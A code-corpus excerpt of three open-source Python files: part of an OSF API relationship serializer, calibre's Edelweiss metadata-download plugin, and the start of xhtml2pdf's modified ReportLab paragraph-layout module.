raise exceptions.NotFound(detail='Node with id "{}" was not found'.format(node_id))
nodes_to_add.append(node)
return nodes_to_add, diff['remove'].values()
def make_instance_obj(self, obj):
# Convenience method to format instance based on view's get_object
return {
'data': [
pointer for pointer in
obj.linked_nodes.filter(is_deleted=False, type='osf.registration')
], 'self': obj,
}
def update(self, instance, validated_data):
collection = instance['self']
auth = utils.get_user_auth(self.context['request'])
add, remove = self.get_pointers_to_add_remove(pointers=instance['data'], new_pointers=validated_data['data'])
for pointer in remove:
collection.rm_pointer(pointer, auth)
for node in add:
try:
collection.add_pointer(node, auth)
except ValueError as e:
raise api_exceptions.InvalidModelValueError(
detail=str(e),
)
return self.make_instance_obj(collection)
def create(self, validated_data):
instance = self.context['view'].get_object()
auth = utils.get_user_auth(self.context['request'])
collection = instance['self']
add, remove = self.get_pointers_to_add_remove(pointers=instance['data'], new_pointers=validated_data['data'])
if not len(add):
raise api_exceptions.RelationshipPostMakesNoChanges
for node in add:
try:
collection.add_pointer(node, auth)
except ValueError as e:
raise api_exceptions.InvalidModelValueError(
detail=str(e),
)
return self.make_instance_obj(collection)
class LinkedPreprintsRelationshipSerializer(LinkedNodesRelationshipSerializer):
data = ser.ListField(child=LinkedPreprint())
def get_self_url(self, obj):
return obj['self'].linked_preprints_self_url
def get_related_url(self, obj):
return obj['self'].linked_preprints_related_url
class Meta:
@staticmethod
def get_type(request):
if StrictVersion(request.version) < StrictVersion('2.13'):
return 'linked_preprints'
return 'preprints'
def make_instance_obj(self, obj):
# Convenience method to format instance based on view's get_object
return {
'data': [
pointer for pointer in
obj.linked_nodes.filter(deleted__isnull=True, type='osf.preprint')
], 'self': obj,
}
class MaintenanceStateSerializer(ser.ModelSerializer):
class Meta:
model = MaintenanceState
fields = ('level', 'message', 'start', 'end')
| apache-2.0 |
insomnia-lab/calibre | src/calibre/ebooks/metadata/sources/edelweiss.py | 1 | 15346 | #!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:fdm=marker:ai
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2013, Kovid Goyal <kovid at kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import time, re
from threading import Thread
from Queue import Queue, Empty
from calibre import as_unicode, random_user_agent
from calibre.ebooks.metadata import check_isbn
from calibre.ebooks.metadata.sources.base import Source
def parse_html(raw):
import html5lib
from calibre.ebooks.chardet import xml_to_unicode
from calibre.utils.cleantext import clean_ascii_chars
raw = clean_ascii_chars(xml_to_unicode(raw, strip_encoding_pats=True,
resolve_entities=True, assume_utf8=True)[0])
return html5lib.parse(raw, treebuilder='lxml',
namespaceHTMLElements=False).getroot()
def CSSSelect(expr):
from cssselect import HTMLTranslator
from lxml.etree import XPath
return XPath(HTMLTranslator().css_to_xpath(expr))
def astext(node):
from lxml import etree
return etree.tostring(node, method='text', encoding=unicode,
with_tail=False).strip()
class Worker(Thread): # {{{
def __init__(self, sku, url, relevance, result_queue, br, timeout, log, plugin):
Thread.__init__(self)
self.daemon = True
self.url, self.br, self.log, self.timeout = url, br, log, timeout
self.result_queue, self.plugin, self.sku = result_queue, plugin, sku
self.relevance = relevance
def run(self):
try:
raw = self.br.open_novisit(self.url, timeout=self.timeout).read()
except:
self.log.exception('Failed to load details page: %r'%self.url)
return
try:
mi = self.parse(raw)
mi.source_relevance = self.relevance
self.plugin.clean_downloaded_metadata(mi)
self.result_queue.put(mi)
except:
self.log.exception('Failed to parse details page: %r'%self.url)
def parse(self, raw):
from calibre.ebooks.metadata.book.base import Metadata
from calibre.utils.date import parse_only_date, UNDEFINED_DATE
root = parse_html(raw)
sku = CSSSelect('div.sku.attGroup')(root)[0]
info = sku.getparent()
top = info.getparent().getparent()
banner = top.find('div')
spans = banner.findall('span')
title = ''
for i, span in enumerate(spans):
if i == 0 or '12pt' in span.get('style', ''):
title += astext(span)
else:
break
authors = [re.sub(r'\(.*\)', '', x).strip() for x in astext(spans[-1]).split(',')]
mi = Metadata(title.strip(), authors)
# Identifiers
isbns = [check_isbn(x.strip()) for x in astext(sku).split(',')]
for isbn in isbns:
if isbn:
self.plugin.cache_isbn_to_identifier(isbn, self.sku)
isbns = sorted(isbns, key=lambda x:len(x) if x else 0, reverse=True)
if isbns and isbns[0]:
mi.isbn = isbns[0]
mi.set_identifier('edelweiss', self.sku)
# Tags
bisac = CSSSelect('div.bisac.attGroup')(root)
if bisac:
bisac = astext(bisac[0])
mi.tags = [x.strip() for x in bisac.split(',')]
mi.tags = [t[1:].strip() if t.startswith('&') else t for t in mi.tags]
# Publisher
pub = CSSSelect('div.supplier.attGroup')(root)
if pub:
pub = astext(pub[0])
mi.publisher = pub
# Pubdate
pub = CSSSelect('div.shipDate.attGroupItem')(root)
if pub:
pub = astext(pub[0])
parts = pub.partition(':')[0::2]
pub = parts[1] or parts[0]
try:
if ', Ship Date:' in pub:
pub = pub.partition(', Ship Date:')[0]
q = parse_only_date(pub, assume_utc=True)
if q.year != UNDEFINED_DATE:
mi.pubdate = q
except:
self.log.exception('Error parsing published date: %r'%pub)
# Comments
comm = ''
general = CSSSelect('div#pd-general-overview-content')(root)
if general:
q = self.render_comments(general[0])
if q != '<p>No title summary available. </p>':
comm += q
general = CSSSelect('div#pd-general-contributor-content')(root)
if general:
comm += self.render_comments(general[0])
general = CSSSelect('div#pd-general-quotes-content')(root)
if general:
comm += self.render_comments(general[0])
if comm:
mi.comments = comm
# Cover
img = CSSSelect('img.title-image[src]')(root)
if img:
href = img[0].get('src').replace('jacket_covers/medium/',
'jacket_covers/flyout/')
self.plugin.cache_identifier_to_cover_url(self.sku, href)
mi.has_cover = self.plugin.cached_identifier_to_cover_url(self.sku) is not None
return mi
def render_comments(self, desc):
from lxml import etree
from calibre.library.comments import sanitize_comments_html
for c in desc.xpath('descendant::noscript'):
c.getparent().remove(c)
for a in desc.xpath('descendant::a[@href]'):
del a.attrib['href']
a.tag = 'span'
desc = etree.tostring(desc, method='html', encoding=unicode).strip()
# remove all attributes from tags
desc = re.sub(r'<([a-zA-Z0-9]+)\s[^>]+>', r'<\1>', desc)
# Collapse whitespace
# desc = re.sub('\n+', '\n', desc)
# desc = re.sub(' +', ' ', desc)
# Remove comments
desc = re.sub(r'(?s)<!--.*?-->', '', desc)
return sanitize_comments_html(desc)
# }}}
class Edelweiss(Source):
name = 'Edelweiss'
description = _('Downloads metadata and covers from Edelweiss - A catalog updated by book publishers')
capabilities = frozenset(['identify', 'cover'])
touched_fields = frozenset([
'title', 'authors', 'tags', 'pubdate', 'comments', 'publisher',
'identifier:isbn', 'identifier:edelweiss'])
supports_gzip_transfer_encoding = True
has_html_comments = True
@property
def user_agent(self):
# Pass in an index to random_user_agent() to test with a particular
# user agent
return random_user_agent()
def _get_book_url(self, sku):
if sku:
return 'http://edelweiss.abovethetreeline.com/ProductDetailPage.aspx?sku=%s'%sku
def get_book_url(self, identifiers): # {{{
sku = identifiers.get('edelweiss', None)
if sku:
return 'edelweiss', sku, self._get_book_url(sku)
# }}}
def get_cached_cover_url(self, identifiers): # {{{
sku = identifiers.get('edelweiss', None)
if not sku:
isbn = identifiers.get('isbn', None)
if isbn is not None:
sku = self.cached_isbn_to_identifier(isbn)
return self.cached_identifier_to_cover_url(sku)
# }}}
def create_query(self, log, title=None, authors=None, identifiers={}):
from urllib import urlencode
BASE_URL = 'http://edelweiss.abovethetreeline.com/Browse.aspx?source=catalog&rg=4187&group=browse&pg=0&'
params = {
'browseType':'title', 'startIndex':0, 'savecook':1, 'sord':20, 'secSord':20, 'tertSord':20,
}
keywords = []
isbn = check_isbn(identifiers.get('isbn', None))
if isbn is not None:
keywords.append(isbn)
elif title:
title_tokens = list(self.get_title_tokens(title))
if title_tokens:
keywords.extend(title_tokens)
# Searching with author names does not work on edelweiss
# author_tokens = self.get_author_tokens(authors,
# only_first_author=True)
# if author_tokens:
# keywords.extend(author_tokens)
if not keywords:
return None
params['bsk'] = (' '.join(keywords)).encode('utf-8')
return BASE_URL+urlencode(params)
# }}}
def identify(self, log, result_queue, abort, title=None, authors=None, # {{{
identifiers={}, timeout=30):
from urlparse import parse_qs
book_url = self._get_book_url(identifiers.get('edelweiss', None))
br = self.browser
if book_url:
entries = [(book_url, identifiers['edelweiss'])]
else:
entries = []
query = self.create_query(log, title=title, authors=authors,
identifiers=identifiers)
if not query:
log.error('Insufficient metadata to construct query')
return
log('Using query URL:', query)
try:
raw = br.open_novisit(query, timeout=timeout).read()
except Exception as e:
log.exception('Failed to make identify query: %r'%query)
return as_unicode(e)
try:
root = parse_html(raw)
except Exception as e:
log.exception('Failed to parse identify results')
return as_unicode(e)
has_isbn = check_isbn(identifiers.get('isbn', None)) is not None
if not has_isbn:
author_tokens = set(x.lower() for x in self.get_author_tokens(authors, only_first_author=True))
for entry in CSSSelect('div.listRow div.listRowMain')(root):
a = entry.xpath('descendant::a[contains(@href, "sku=") and contains(@href, "productDetailPage.aspx")]')
if not a:
continue
href = a[0].get('href')
prefix, qs = href.partition('?')[0::2]
sku = parse_qs(qs).get('sku', None)
if sku and sku[0]:
sku = sku[0]
div = CSSSelect('div.sku.attGroup')(entry)
if div:
text = astext(div[0])
isbns = [check_isbn(x.strip()) for x in text.split(',')]
for isbn in isbns:
if isbn:
self.cache_isbn_to_identifier(isbn, sku)
for img in entry.xpath('descendant::img[contains(@src, "/jacket_covers/thumbnail/")]'):
self.cache_identifier_to_cover_url(sku, img.get('src').replace('/thumbnail/', '/flyout/'))
div = CSSSelect('div.format.attGroup')(entry)
text = astext(div[0]).lower()
if 'audio' in text or 'mp3' in text: # Audio-book, ignore
continue
if not has_isbn:
# edelweiss returns matches based only on title, so we
# filter by author manually
div = CSSSelect('div.contributor.attGroup')(entry)
try:
entry_authors = set(self.get_author_tokens([x.strip() for x in astext(div[0]).lower().split(',')]))
except IndexError:
entry_authors = set()
if not entry_authors.issuperset(author_tokens):
continue
entries.append((self._get_book_url(sku), sku))
if (not entries and identifiers and title and authors and
not abort.is_set()):
return self.identify(log, result_queue, abort, title=title,
authors=authors, timeout=timeout)
if not entries:
return
workers = [Worker(sku, url, i, result_queue, br.clone_browser(), timeout, log, self)
for i, (url, sku) in enumerate(entries[:5])]
for w in workers:
w.start()
# Don't send all requests at the same time
time.sleep(0.1)
while not abort.is_set():
a_worker_is_alive = False
for w in workers:
w.join(0.2)
if abort.is_set():
break
if w.is_alive():
a_worker_is_alive = True
if not a_worker_is_alive:
break
# }}}
def download_cover(self, log, result_queue, abort, # {{{
title=None, authors=None, identifiers={}, timeout=30, get_best_cover=False):
cached_url = self.get_cached_cover_url(identifiers)
if cached_url is None:
log.info('No cached cover found, running identify')
rq = Queue()
self.identify(log, rq, abort, title=title, authors=authors,
identifiers=identifiers)
if abort.is_set():
return
results = []
while True:
try:
results.append(rq.get_nowait())
except Empty:
break
results.sort(key=self.identify_results_keygen(
title=title, authors=authors, identifiers=identifiers))
for mi in results:
cached_url = self.get_cached_cover_url(mi.identifiers)
if cached_url is not None:
break
if cached_url is None:
log.info('No cover found')
return
if abort.is_set():
return
br = self.browser
log('Downloading cover from:', cached_url)
try:
cdata = br.open_novisit(cached_url, timeout=timeout).read()
result_queue.put((self, cdata))
except:
log.exception('Failed to download cover from:', cached_url)
# }}}
if __name__ == '__main__':
from calibre.ebooks.metadata.sources.test import (
test_identify_plugin, title_test, authors_test, comments_test, pubdate_test)
tests = [
( # A title and author search
{'title': 'The Husband\'s Secret', 'authors':['Liane Moriarty']},
[title_test('The Husband\'s Secret', exact=True),
authors_test(['Liane Moriarty'])]
),
( # An isbn present in edelweiss
{'identifiers':{'isbn': '9780312621360'}, },
[title_test('Flame: A Sky Chasers Novel', exact=True),
authors_test(['Amy Kathleen Ryan'])]
),
# Multiple authors and two part title and no general description
({'identifiers':{'edelweiss':'0321180607'}},
[title_test(
"XQuery from the Experts: A Guide to the W3C XML Query Language"
, exact=True), authors_test([
'Howard Katz', 'Don Chamberlin', 'Denise Draper', 'Mary Fernandez',
'Michael Kay', 'Jonathan Robie', 'Michael Rys', 'Jerome Simeon',
'Jim Tivy', 'Philip Wadler']), pubdate_test(2003, 8, 22),
comments_test('Jérôme Siméon'), lambda mi: bool(mi.comments and 'No title summary' not in mi.comments)
]),
]
start, stop = 0, len(tests)
tests = tests[start:stop]
test_identify_plugin(Edelweiss.name, tests)
| gpl-3.0 |
jacobwegner/xhtml2pdf | xhtml2pdf/reportlab_paragraph.py | 60 | 68840 | # -*- coding: utf-8 -*-
# Copyright ReportLab Europe Ltd. 2000-2008
# see license.txt for license details
# history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/paragraph.py
# Modifications by Dirk Holtwick, 2008
from string import join, whitespace
from operator import truth
from reportlab.pdfbase.pdfmetrics import stringWidth, getAscentDescent
from reportlab.platypus.paraparser import ParaParser
from reportlab.platypus.flowables import Flowable
from reportlab.lib.colors import Color
from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY
from reportlab.lib.textsplit import ALL_CANNOT_START
from copy import deepcopy
from reportlab.lib.abag import ABag
import re
PARAGRAPH_DEBUG = False
LEADING_FACTOR = 1.0
_wsc_re_split=re.compile('[%s]+'% re.escape(''.join((
u'\u0009', # HORIZONTAL TABULATION
u'\u000A', # LINE FEED
u'\u000B', # VERTICAL TABULATION
u'\u000C', # FORM FEED
u'\u000D', # CARRIAGE RETURN
u'\u001C', # FILE SEPARATOR
u'\u001D', # GROUP SEPARATOR
u'\u001E', # RECORD SEPARATOR
u'\u001F', # UNIT SEPARATOR
u'\u0020', # SPACE
u'\u0085', # NEXT LINE
#u'\u00A0', # NO-BREAK SPACE
u'\u1680', # OGHAM SPACE MARK
u'\u2000', # EN QUAD
u'\u2001', # EM QUAD
u'\u2002', # EN SPACE
u'\u2003', # EM SPACE
u'\u2004', # THREE-PER-EM SPACE
u'\u2005', # FOUR-PER-EM SPACE
u'\u2006', # SIX-PER-EM SPACE
u'\u2007', # FIGURE SPACE
u'\u2008', # PUNCTUATION SPACE
u'\u2009', # THIN SPACE
u'\u200A', # HAIR SPACE
u'\u200B', # ZERO WIDTH SPACE
u'\u2028', # LINE SEPARATOR
u'\u2029', # PARAGRAPH SEPARATOR
u'\u202F', # NARROW NO-BREAK SPACE
u'\u205F', # MEDIUM MATHEMATICAL SPACE
u'\u3000', # IDEOGRAPHIC SPACE
)))).split
def split(text, delim=None):
if type(text) is str:
text = text.decode('utf8')
if type(delim) is str:
delim = delim.decode('utf8')
elif delim is None and u'\xa0' in text:
return [uword.encode('utf8') for uword in _wsc_re_split(text)]
return [uword.encode('utf8') for uword in text.split(delim)]
def strip(text):
if type(text) is str:
text = text.decode('utf8')
return text.strip().encode('utf8')
class ParaLines(ABag):
"""
class ParaLines contains the broken into lines representation of Paragraphs
kind=0 Simple
fontName, fontSize, textColor apply to whole Paragraph
lines [(extraSpace1,words1),....,(extraspaceN,wordsN)]
kind==1 Complex
lines [FragLine1,...,FragLineN]
"""
class FragLine(ABag):
"""
class FragLine contains a styled line (ie a line with more than one style)::
extraSpace unused space for justification only
wordCount 1+spaces in line for justification purposes
words [ParaFrags] style text lumps to be concatenated together
fontSize maximum fontSize seen on the line; not used at present,
but could be used for line spacing.
"""
#our one and only parser
# XXXXX if the parser has any internal state using only one is probably a BAD idea!
_parser=ParaParser()
def _lineClean(L):
return join(filter(truth,split(strip(L))))
def cleanBlockQuotedText(text,joiner=' '):
"""This is an internal utility which takes triple-
quoted text form within the document and returns
(hopefully) the paragraph the user intended originally."""
L=filter(truth,map(_lineClean, split(text, '\n')))
return join(L, joiner)
def setXPos(tx,dx):
if dx>1e-6 or dx<-1e-6:
tx.setXPos(dx)
def _leftDrawParaLine( tx, offset, extraspace, words, last=0):
setXPos(tx,offset)
tx._textOut(join(words),1)
setXPos(tx,-offset)
return offset
def _centerDrawParaLine( tx, offset, extraspace, words, last=0):
m = offset + 0.5 * extraspace
setXPos(tx,m)
tx._textOut(join(words),1)
setXPos(tx,-m)
return m
def _rightDrawParaLine( tx, offset, extraspace, words, last=0):
m = offset + extraspace
setXPos(tx,m)
tx._textOut(join(words),1)
setXPos(tx,-m)
return m
def _justifyDrawParaLine( tx, offset, extraspace, words, last=0):
setXPos(tx,offset)
text = join(words)
if last:
#last one, left align
tx._textOut(text,1)
else:
nSpaces = len(words)-1
if nSpaces:
tx.setWordSpace(extraspace / float(nSpaces))
tx._textOut(text,1)
tx.setWordSpace(0)
else:
tx._textOut(text,1)
setXPos(tx,-offset)
return offset
def imgVRange(h,va,fontSize):
'''return bottom,top offsets relative to baseline(0)'''
if va=='baseline':
iyo = 0
elif va in ('text-top','top'):
iyo = fontSize-h
elif va=='middle':
iyo = fontSize - (1.2*fontSize+h)*0.5
elif va in ('text-bottom','bottom'):
iyo = fontSize - 1.2*fontSize
elif va=='super':
iyo = 0.5*fontSize
elif va=='sub':
iyo = -0.5*fontSize
elif hasattr(va,'normalizedValue'):
iyo = va.normalizedValue(fontSize)
else:
iyo = va
return iyo,iyo+h
_56=5./6
_16=1./6
def _putFragLine(cur_x, tx, line):
xs = tx.XtraState
cur_y = xs.cur_y
x0 = tx._x0
autoLeading = xs.autoLeading
leading = xs.leading
cur_x += xs.leftIndent
dal = autoLeading in ('min','max')
if dal:
if autoLeading=='max':
ascent = max(_56*leading,line.ascent)
descent = max(_16*leading,-line.descent)
else:
ascent = line.ascent
descent = -line.descent
leading = ascent+descent
if tx._leading!=leading:
tx.setLeading(leading)
if dal:
olb = tx._olb
if olb is not None:
xcy = olb-ascent
if tx._oleading!=leading:
cur_y += leading - tx._oleading
if abs(xcy-cur_y)>1e-8:
cur_y = xcy
tx.setTextOrigin(x0,cur_y)
xs.cur_y = cur_y
tx._olb = cur_y - descent
tx._oleading = leading
ws = getattr(tx,'_wordSpace',0)
nSpaces = 0
words = line.words
for f in words:
if hasattr(f,'cbDefn'):
cbDefn = f.cbDefn
kind = cbDefn.kind
if kind=='img':
#draw image cbDefn,cur_y,cur_x
w = cbDefn.width
h = cbDefn.height
txfs = tx._fontsize
if txfs is None:
txfs = xs.style.fontSize
iy0,iy1 = imgVRange(h,cbDefn.valign,txfs)
cur_x_s = cur_x + nSpaces*ws
# print "draw", id(f), id(cbDefn.image), repr(dal), cur_y, iy0, iy1, h
tx._canvas.drawImage(cbDefn.image.getImage(),cur_x_s,cur_y+iy0,w,h,mask='auto')
cur_x += w
cur_x_s += w
setXPos(tx,cur_x_s-tx._x0)
elif kind=='barcode':
barcode = cbDefn.barcode
w = cbDefn.width
h = cbDefn.height
txfs = tx._fontsize
if txfs is None:
txfs = xs.style.fontSize
iy0, iy1 = imgVRange(h, cbDefn.valign, txfs)
cur_x_s = cur_x + nSpaces*ws
barcode.draw(canvas=tx._canvas, xoffset=cur_x_s)
cur_x += w
cur_x_s += w
setXPos(tx, cur_x_s-tx._x0)
else:
name = cbDefn.name
if kind=='anchor':
tx._canvas.bookmarkHorizontal(name,cur_x,cur_y+leading)
else:
func = getattr(tx._canvas,name,None)
if not func:
raise AttributeError("Missing %s callback attribute '%s'" % (kind,name))
func(tx._canvas,kind,cbDefn.label)
if f is words[-1]:
if not tx._fontname:
tx.setFont(xs.style.fontName,xs.style.fontSize)
tx._textOut('',1)
elif kind=='img':
tx._textOut('',1)
else:
cur_x_s = cur_x + nSpaces*ws
if (tx._fontname,tx._fontsize)!=(f.fontName,f.fontSize):
tx._setFont(f.fontName, f.fontSize)
if xs.textColor!=f.textColor:
xs.textColor = f.textColor
tx.setFillColor(f.textColor)
if xs.rise!=f.rise:
xs.rise=f.rise
tx.setRise(f.rise)
text = f.text
tx._textOut(text,f is words[-1]) # cheap textOut
# XXX Modified for XHTML2PDF
# Background colors (done like underline)
# print "#", repr(f.text), f.fontSize, f.backColor, f.underline
if hasattr(f, "backColor"):
if xs.backgroundColor != f.backColor or xs.backgroundFontSize != f.fontSize:
if xs.backgroundColor is not None:
xs.backgrounds.append((xs.background_x, cur_x_s, xs.backgroundColor, xs.backgroundFontSize))
xs.background_x = cur_x_s
xs.backgroundColor = f.backColor
xs.backgroundFontSize = f.fontSize
# Underline
if not xs.underline and f.underline:
xs.underline = 1
xs.underline_x = cur_x_s
xs.underlineColor = f.textColor
elif xs.underline:
if not f.underline:
xs.underline = 0
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
xs.underlineColor = None
elif xs.textColor != xs.underlineColor:
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
xs.underlineColor = xs.textColor
xs.underline_x = cur_x_s
# Strike
if not xs.strike and f.strike:
xs.strike = 1
xs.strike_x = cur_x_s
xs.strikeColor = f.textColor
# XXX Modified for XHTML2PDF
xs.strikeFontSize = f.fontSize
elif xs.strike:
if not f.strike:
xs.strike = 0
# XXX Modified for XHTML2PDF
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
xs.strikeColor = None
xs.strikeFontSize = None
elif xs.textColor != xs.strikeColor:
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
xs.strikeColor = xs.textColor
xs.strikeFontSize = f.fontSize
xs.strike_x = cur_x_s
if f.link and not xs.link:
if not xs.link:
xs.link = f.link
xs.link_x = cur_x_s
xs.linkColor = xs.textColor
elif xs.link:
if not f.link:
xs.links.append( (xs.link_x, cur_x_s, xs.link, xs.linkColor) )
xs.link = None
xs.linkColor = None
elif f.link!=xs.link or xs.textColor!=xs.linkColor:
xs.links.append( (xs.link_x, cur_x_s, xs.link, xs.linkColor) )
xs.link = f.link
xs.link_x = cur_x_s
xs.linkColor = xs.textColor
txtlen = tx._canvas.stringWidth(text, tx._fontname, tx._fontsize)
cur_x += txtlen
nSpaces += text.count(' ')
cur_x_s = cur_x+(nSpaces-1)*ws
# XXX Modified for XHTML2PDF
# Underline
if xs.underline:
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
# XXX Modified for XHTML2PDF
# Backcolor
if hasattr(f, "backColor"):
if xs.backgroundColor is not None:
xs.backgrounds.append((xs.background_x, cur_x_s, xs.backgroundColor, xs.backgroundFontSize))
# XXX Modified for XHTML2PDF
# Strike
if xs.strike:
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
if xs.link:
xs.links.append( (xs.link_x, cur_x_s, xs.link,xs.linkColor) )
if tx._x0!=x0:
setXPos(tx,x0-tx._x0)
def _leftDrawParaLineX( tx, offset, line, last=0):
setXPos(tx,offset)
_putFragLine(offset, tx, line)
setXPos(tx,-offset)
def _centerDrawParaLineX( tx, offset, line, last=0):
m = offset+0.5*line.extraSpace
setXPos(tx,m)
_putFragLine(m,tx, line)
setXPos(tx,-m)
def _rightDrawParaLineX( tx, offset, line, last=0):
m = offset+line.extraSpace
setXPos(tx,m)
_putFragLine(m,tx, line)
setXPos(tx,-m)
def _justifyDrawParaLineX( tx, offset, line, last=0):
setXPos(tx,offset)
extraSpace = line.extraSpace
nSpaces = line.wordCount - 1
if last or not nSpaces or abs(extraSpace)<=1e-8 or line.lineBreak:
_putFragLine(offset, tx, line) #no space modification
else:
tx.setWordSpace(extraSpace / float(nSpaces))
_putFragLine(offset, tx, line)
tx.setWordSpace(0)
setXPos(tx,-offset)
# XXX Modified for XHTML2PDF
# !!! Important, don't import accelerators !!!
#try:
# from _rl_accel import _sameFrag
#except ImportError:
# try:
# from reportlab.lib._rl_accel import _sameFrag
# except ImportError:
def _sameFrag(f,g):
'returns 1 if two ParaFrags map out the same'
if (hasattr(f,'cbDefn') or hasattr(g,'cbDefn')
or hasattr(f,'lineBreak') or hasattr(g,'lineBreak')): return 0
for a in ('fontName', 'fontSize', 'textColor', 'backColor', 'rise', 'underline', 'strike', 'link'):
if getattr(f,a,None)!=getattr(g,a,None): return 0
return 1
def _getFragWords(frags):
''' given a Parafrag list return a list of fragwords
[[size, (f00,w00), ..., (f0n,w0n)],....,[size, (fm0,wm0), ..., (f0n,wmn)]]
each pair f,w represents a style and some string
each sublist represents a word
'''
R = []
W = []
n = 0
hangingStrip = False
for f in frags:
text = f.text
#del f.text # we can't do this until we sort out splitting
# of paragraphs
if text!='':
if hangingStrip:
hangingStrip = False
text = text.lstrip()
#if type(text) is str:
# text = text.decode('utf8')
S = split(text)
if S==[]: S = ['']
if W!=[] and text[0] in whitespace:
W.insert(0,n)
R.append(W)
W = []
n = 0
for w in S[:-1]:
W.append((f,w))
n += stringWidth(w, f.fontName, f.fontSize)
W.insert(0,n)
R.append(W)
W = []
n = 0
w = S[-1]
W.append((f,w))
n += stringWidth(w, f.fontName, f.fontSize)
if text and text[-1] in whitespace:
W.insert(0,n)
R.append(W)
W = []
n = 0
elif hasattr(f,'cbDefn'):
w = getattr(f.cbDefn,'width',0)
if w:
if W!=[]:
W.insert(0,n)
R.append(W)
W = []
n = 0
R.append([w,(f,'')])
else:
W.append((f,''))
elif hasattr(f, 'lineBreak'):
#pass the frag through. The line breaker will scan for it.
if W!=[]:
W.insert(0,n)
R.append(W)
W = []
n = 0
R.append([0,(f,'')])
hangingStrip = True
if W!=[]:
W.insert(0,n)
R.append(W)
return R
def _split_blParaSimple(blPara,start,stop):
f = blPara.clone()
for a in ('lines', 'kind', 'text'):
if hasattr(f,a): delattr(f,a)
f.words = []
for l in blPara.lines[start:stop]:
for w in l[1]:
f.words.append(w)
return [f]
def _split_blParaHard(blPara,start,stop):
f = []
lines = blPara.lines[start:stop]
for l in lines:
for w in l.words:
f.append(w)
if l is not lines[-1]:
i = len(f)-1
while i>=0 and hasattr(f[i],'cbDefn') and not getattr(f[i].cbDefn,'width',0): i -= 1
if i>=0:
g = f[i]
if not g.text: g.text = ' '
elif g.text[-1]!=' ': g.text += ' '
return f
def _drawBullet(canvas, offset, cur_y, bulletText, style):
'''draw a bullet text could be a simple string or a frag list'''
tx2 = canvas.beginText(style.bulletIndent, cur_y+getattr(style,"bulletOffsetY",0))
tx2.setFont(style.bulletFontName, style.bulletFontSize)
tx2.setFillColor(hasattr(style,'bulletColor') and style.bulletColor or style.textColor)
if isinstance(bulletText,basestring):
tx2.textOut(bulletText)
else:
for f in bulletText:
if hasattr(f, "image"):
image = f.image
width = image.drawWidth
height = image.drawHeight
gap = style.bulletFontSize * 0.25
img = image.getImage()
# print style.bulletIndent, offset, width
canvas.drawImage(
img,
style.leftIndent - width - gap,
cur_y+getattr(style,"bulletOffsetY",0),
width,
height)
else:
tx2.setFont(f.fontName, f.fontSize)
tx2.setFillColor(f.textColor)
tx2.textOut(f.text)
canvas.drawText(tx2)
#AR making definition lists a bit less ugly
#bulletEnd = tx2.getX()
bulletEnd = tx2.getX() + style.bulletFontSize * 0.6
offset = max(offset,bulletEnd - style.leftIndent)
return offset
def _handleBulletWidth(bulletText,style,maxWidths):
'''work out bullet width and adjust maxWidths[0] if neccessary
'''
if bulletText:
if isinstance(bulletText,basestring):
bulletWidth = stringWidth( bulletText, style.bulletFontName, style.bulletFontSize)
else:
#it's a list of fragments
bulletWidth = 0
for f in bulletText:
bulletWidth = bulletWidth + stringWidth(f.text, f.fontName, f.fontSize)
bulletRight = style.bulletIndent + bulletWidth + 0.6 * style.bulletFontSize
indent = style.leftIndent+style.firstLineIndent
if bulletRight > indent:
#..then it overruns, and we have less space available on line 1
maxWidths[0] -= (bulletRight - indent)
def splitLines0(frags,widths):
'''
given a list of ParaFrags we return a list of ParaLines
each ParaLine has
1) ExtraSpace
2) blankCount
3) [textDefns....]
each text definition is a (ParaFrag, start, limit) triplet
'''
#initialise the algorithm
lines = []
lineNum = 0
maxW = widths[lineNum]
i = -1
l = len(frags)
lim = start = 0
while 1:
#find a non whitespace character
while i<l:
while start<lim and text[start]==' ': start += 1
if start==lim:
i += 1
if i==l: break
start = 0
f = frags[i]
text = f.text
lim = len(text)
else:
break # we found one
if start==lim: break #if we didn't find one we are done
#start of a line
g = (None,None,None)
line = []
cLen = 0
nSpaces = 0
while cLen<maxW:
j = text.find(' ',start)
if j<0: j==lim
w = stringWidth(text[start:j],f.fontName,f.fontSize)
cLen += w
if cLen>maxW and line!=[]:
cLen = cLen-w
#this is the end of the line
while g.text[lim]==' ':
lim = lim - 1
nSpaces = nSpaces-1
break
if j<0: j = lim
if g[0] is f: g[2] = j #extend
else:
g = (f,start,j)
line.append(g)
if j==lim:
i += 1
def _do_under_line(i, t_off, ws, tx, lm=-0.125):
y = tx.XtraState.cur_y - i*tx.XtraState.style.leading + lm*tx.XtraState.f.fontSize
textlen = tx._canvas.stringWidth(join(tx.XtraState.lines[i][1]), tx._fontname, tx._fontsize)
tx._canvas.line(t_off, y, t_off+textlen+ws, y)
_scheme_re = re.compile('^[a-zA-Z][-+a-zA-Z0-9]+$')
def _doLink(tx,link,rect):
if isinstance(link,unicode):
link = link.encode('utf8')
parts = link.split(':',1)
scheme = len(parts)==2 and parts[0].lower() or ''
if _scheme_re.match(scheme) and scheme!='document':
kind=scheme.lower()=='pdf' and 'GoToR' or 'URI'
if kind=='GoToR': link = parts[1]
tx._canvas.linkURL(link, rect, relative=1, kind=kind)
else:
if link[0]=='#':
link = link[1:]
scheme=''
tx._canvas.linkRect("", scheme!='document' and link or parts[1], rect, relative=1)
def _do_link_line(i, t_off, ws, tx):
xs = tx.XtraState
leading = xs.style.leading
y = xs.cur_y - i*leading - xs.f.fontSize/8.0 # 8.0 factor copied from para.py
text = join(xs.lines[i][1])
textlen = tx._canvas.stringWidth(text, tx._fontname, tx._fontsize)
_doLink(tx, xs.link, (t_off, y, t_off+textlen+ws, y+leading))
# XXX Modified for XHTML2PDF
def _do_post_text(tx):
"""
Try to find out what the variables mean:
tx A structure containing more informations about paragraph ???
leading Height of lines
